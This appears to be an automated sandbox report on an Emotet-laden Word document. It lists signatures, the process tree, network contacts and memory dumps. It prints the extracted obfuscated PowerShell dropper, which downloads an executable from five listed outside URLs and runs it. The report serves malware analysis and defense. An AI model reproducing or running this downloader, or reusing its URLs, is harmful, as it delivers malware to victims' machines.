Analysis

  • max time kernel: 30s
  • resource: win10v191014
  • submitted: 18-12-2019 18:25

General

  • Target: 8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75
  • Sample: 191218-2q4bex5dys
  • SHA256: 8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75

Score: 10/10

Malware Config

Extracted

Language: ps1

Source:

$Bwlbjjmjzv='Itmpmrnhllu';$Viiigpzeesv = '873';$Njstbhluo='Ureafvntsxwno';$Kdqglwao=$env:userprofile+'\'+$Viiigpzeesv+'.exe';$Hrypcpub='Qfuifoed';$Mkxtjiarr=.('new-obj'+'ec'+'t') Net.weBClieNt;$Vgxpramjsb='http://moisesdavid.com/qoong/vy/*http://insurancebabu.com/wp-admin/iXElcu9f/*http://rishi99.com/framework.impossible/dhADGeie6/*https://www.alertpage.net/confirmation/2nX/*https://anttarc.org/chartaxd/DMBuiwf5u/'."SPl`iT"('*');$Aigfqhdpkrwe='Zuwzhkaq';foreach($Cuzhdfqocjwx in $Vgxpramjsb){try{$Mkxtjiarr."D`OwN`lOADfiLE"($Cuzhdfqocjwx, $Kdqglwao);$Opskmjrjyaazl='Uleqfgmetjkrf';If ((&('Get-I'+'t'+'em') $Kdqglwao)."l`E`Ngth" -ge 36977) {[Diagnostics.Process]::"STA`RT"($Kdqglwao);$Kairapscbzm='Zzjeamzw';break;$Rblybcrl='Jqzcayfscpft'}}catch{}}$Ujbnfjfu='Qqpqrajnzksja'
URLs

  • exe.dropper: http://moisesdavid.com/qoong/vy/
  • exe.dropper: http://insurancebabu.com/wp-admin/iXElcu9f/
  • exe.dropper: http://rishi99.com/framework.impossible/dhADGeie6/
  • exe.dropper: https://www.alertpage.net/confirmation/2nX/
  • exe.dropper: https://anttarc.org/chartaxd/DMBuiwf5u/

Extracted

Family

emotet

C2


rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Process spawned unexpected child process (1 IoC)
  • Suspicious use of WriteProcessMemory (2 IoCs)
  • Suspicious behavior: EmotetMutantsSpam (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Executes dropped EXE (2 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (3 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75.doc" /o ""
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4976
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en [base64-encoded command omitted]
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4696
    • C:\Users\Admin\873.exe
      "C:\Users\Admin\873.exe"
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4440
      • C:\Users\Admin\873.exe
        --30b98952
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4412

Network

  • 104.24.115.19:80
    moisesdavid.com
    Powershell.exe
  • 104.24.115.19:443
    moisesdavid.com
    Powershell.exe
  • 10.10.0.255:137
  • 8.8.8.8:53
    moisesdavid.com
    DNS Request: moisesdavid.com
    DNS Response: 104.24.115.19, 104.24.114.19
  • 10.10.0.11:137
  • 10.10.0.40:137
  • 224.0.0.22

MITRE ATT&CK Enterprise v6


Downloads

  • memory/4412-12-0x0000000000760000-0x0000000000777000-memory.dmp (Filesize: 92KB)
  • memory/4412-13-0x0000000000400000-0x00000000004C1000-memory.dmp (Filesize: 772KB)
  • memory/4440-10-0x0000000002100000-0x0000000002117000-memory.dmp (Filesize: 92KB)
  • memory/4976-2-0x000002466E3A7000-0x000002466E3A8000-memory.dmp (Filesize: 4KB)
